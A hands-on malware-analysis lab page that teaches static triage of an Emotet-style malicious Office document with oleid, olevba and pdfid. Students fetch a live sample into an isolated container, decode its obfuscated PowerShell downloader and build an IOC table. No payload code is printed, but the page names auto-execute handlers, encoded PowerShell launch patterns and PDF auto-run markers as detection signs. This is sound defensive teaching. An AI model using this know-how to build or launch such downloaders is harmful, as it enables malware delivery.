Lab 11 — Document & Script Malware¶

Hands-on lab · ← Back to the module concept

Setup¶

git clone https://github.com/plaintext-security/plaintext-labs
cd plaintext-labs/malware/11-document-script-malware
make up
make fetch-sample      # pulls a real maldoc from MalwareBazaar into the isolated container
make demo

⚠ This lab analyzes a live malicious document. Handle it accordingly. - Static only — never open it. A maldoc is live malware. Do not open the document in Word/Excel/a viewer, do not enable macros, and do not execute the VBA or the PowerShell it drops. You only ever parse it: olevba extracts and reads the macro source; oleid/pdfid count risk indicators. Reading the macro is safe; running it is not. - Isolation. All work stays inside the isolated container; never copy the sample to your host or to a Windows machine where a double-click could detonate it. - Hygiene. The sample is fetched at lab time (password-protected zip, password infected) and is never committed — .gitignore covers samples/. make fetch-sample needs a free abuse.ch Auth-Key (set MB_AUTH_KEY). Default tag is maldoc; for the Emotet downloader specifically, run TAG=Emotet make fetch-sample. - Offline fallback. No key / MalwareBazaar unreachable? Skip make fetch-sample; make demo falls back to the bundled synthetic suspicious.doc / suspicious.pdf / obfuscated.ps1 — legible, deterministic, and benign.

Scenario¶

A triage queue drops a Word attachment an email gateway flagged as a likely maldoc — most likely Emotet, the modular downloader that for years arrived as exactly this: a phishing Office document whose macro launches PowerShell to pull the next stage. Before anyone opens it (and nobody opens it), the team needs a static dissection for the case ticket: extract the embedded VBA macro without running it, deobfuscate it, and recover the PowerShell downloader and its URLs/IOCs from the source alone. Your job is to produce that dissection with olevba (Decalage's oletools), map what you find to Emotet's delivery chain — T1566.001 (spearphishing attachment) → T1059.005 (VBA) → T1059.001 (PowerShell) — and write the IOC table the intel team can action.

Throughout, the sample = the real maldoc that make fetch-sample drops in samples/ (path printed by the target). In offline mode it is the bundled synthetic suspicious.doc (plus suspicious.pdf and obfuscated.ps1) — benign, but structured to exercise the same olevba/pdfid signals a real maldoc trips.

Do¶

[ ] Fingerprint the document with oleid before you touch the macro. Run oleid against the sample. Record the file type (OLE2 vs OpenXML), and which indicators it raises (VBA macros present, encrypted, external relationships/links, Flash/objects). oleid is your go/no-go: it tells you whether there is a macro worth extracting before you spend time on it.

Hint: oleid /lab/samples/<sample> (real) or oleid /lab/data/suspicious.doc (offline). For a real maldoc you do not know the structure — that is the point.

[ ] Extract and read the VBA macro with olevba — never run it. Run olevba on the sample. It pulls the macro source out of the OLE/OpenXML container statically and deobfuscates common tricks (string concatenation, Chr() sequences, base64). Record: the auto-execute handler (AutoOpen / Document_Open / Workbook_Open), every Shell / CreateObject / WScript / powershell reference, and olevba's flagged IOCs and risk lines. What does the macro intend to do on open?

Hint: olevba /lab/samples/<sample>. Read the VBA MACRO, ANALYSIS, and IOC sections. Emotet-style macros stage and launch a PowerShell one-liner — find where the macro hands off to PowerShell. You are reading source, not executing anything.

[ ] Recover the obfuscated PowerShell downloader from the macro. The macro typically does not contain the URLs in cleartext — it builds a base64 / split-string PowerShell command and passes it to powershell -enc (or concatenates an encoded blob). Pull that command out of the olevba output, base64-decode it (UTF-16LE — PowerShell's native encoding), and recover the staging URLs / file paths / IOCs it would have fetched. Use the bundled helper as a starting point: python3 /lab/data/decode_ps1.py <file>.

Hint: a real Emotet maldoc lists several fallback download URLs. For the offline synthetic, obfuscated.ps1 carries one clearly-fake URL so you can see the exact decode pattern (FromBase64String → Unicode.GetString).

[ ] (If your sample is a PDF) triage it with pdfid. Some maldoc campaigns ship a PDF lure instead. Run pdfid on the sample and record counts for /JS, /JavaScript, /OpenAction, /AA, /EmbeddedFile, /Launch. Which combination auto-runs code on open?

Hint: /JS + /OpenAction together means JavaScript executes automatically when the PDF is opened. Use the bundled suspicious.pdf if your fetched sample is a Word doc.

[ ] Build the IOC table. For each artifact, record: SHA-256 hash, auto-execution trigger, embedded script/payload type (VBA → PowerShell, PDF JS, etc.), the decoded staging URLs / paths, and the ATT&CK technique IDs. Anchor the chain to Emotet: T1566.001 (delivery) → T1059.005 (VBA macro) → T1059.001 (PowerShell) → T1547.001 (Run-key persistence, if present). This is your deliverable.

Success criteria — you're done when¶

[ ] oleid correctly identifies the container type and flags the VBA macro before extraction.
[ ] olevba output shows the extracted macro source and the auto-execute handler — read, never run.
[ ] The obfuscated PowerShell command is base64-decoded and its staging URLs/IOCs recovered.
[ ] (PDF sample) pdfid shows /JS and /OpenAction counts greater than 0.
[ ] ioc-table.md contains every artifact with SHA-256, trigger, payload type, decoded IOCs, and ATT&CK IDs mapped to the Emotet delivery chain.

Deliverables¶

Commit to your portfolio repo: - ioc-table.md — a markdown table with columns: Artifact, SHA-256, Trigger, Payload Type, Decoded IOCs, ATT&CK IDs. - doc_triage.sh — the triage script from Automate & own it. - Do not commit the real maldoc (or the synthetic .doc/.pdf/.ps1), and do not commit screenshots of the macro source. The decoded IOC strings in your table are fine; the live artifact never leaves the container.

Automate & own it¶

Required. Write doc_triage.sh — a shell script that: 1. Accepts a file path as an argument. 2. Computes and prints the SHA-256. 3. Detects the file type (file command). 4. If OLE/OpenXML (.doc/.docx/.docm/.xls/.xlsm/.rtf), runs olevba --detect (or oleid) and prints the result — never opening or executing the document. 5. If .pdf, runs pdfid and greps for /JS, /OpenAction, /EmbeddedFile, /Launch. 6. If .ps1 (or an extracted PowerShell blob), searches for FromBase64String / -enc and prints the line number. 7. Prints a one-line triage verdict: [HIGH], [MEDIUM], or [LOW] based on what it found.

Draft with AI assistance — then read every line: a triage script that opens the file instead of parsing it is the one mistake that detonates the sample. Test against the bundled synthetic files (and the real one if fetched). Commit doc_triage.sh.

AI acceleration¶

Paste the extracted VBA macro source from olevba into a model. Prompt: "This is a VBA macro extracted statically from a suspicious document. List any IOCs, identify the auto-execute handler, decode any obfuscated PowerShell, and assess whether this macro would download or execute a payload — do not assume I will run it." Verify the assessment against what you found manually in steps 2–3. The model is fast at deobfuscation; the judgment that it deobfuscated correctly is yours.

Connects forward¶

Module 12 takes the IOCs you just extracted and structures them into a MISP-compatible format, maps them to ATT&CK, and prepares them for sharing with threat intelligence platforms.

Marketable proof¶

"I triage a real malicious Office document without ever opening it — extracting and deobfuscating the embedded VBA with olevba, recovering the staged PowerShell downloader and its IOCs statically, and mapping the chain to the Emotet delivery technique set (T1566.001 → T1059.005 → T1059.001)."

Stretch¶

Run olevba --deobf and compare its automatic deobfuscation against your manual decode of the PowerShell blob. Where do they differ, and why?
Pull a second sample with a different tag (TAG=Emotet vs maldoc, or an .xlsm) and diff the macro structure: do both use the same auto-exec handler and the same PowerShell hand-off pattern? Note the family fingerprint.

Comments

Sign in with GitHub to comment. Choose the type: Feedback (errors or suggestions on this page) · Hints (help for fellow learners — no spoilers) · General (anything else).